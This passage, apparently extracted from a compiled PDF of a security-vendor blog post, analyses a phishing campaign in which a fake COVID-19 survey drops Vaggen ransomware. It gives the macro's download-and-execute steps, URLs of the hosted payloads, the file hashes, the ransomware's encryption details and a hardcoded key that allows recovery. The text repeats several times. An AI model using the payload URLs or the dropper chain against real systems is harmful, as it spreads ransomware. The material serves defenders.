main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1019 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1020 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1021 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1022 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1023 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1024 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1025 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1026 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1027 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1028 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1029 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1030 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1031 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1032 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1033 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1034 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1035 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1036 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1037 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1038 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1039 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1040 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1041 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1042 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1043 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1044 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1045 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1046 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1047 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1048 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1049 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1050 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1051 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1052 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA 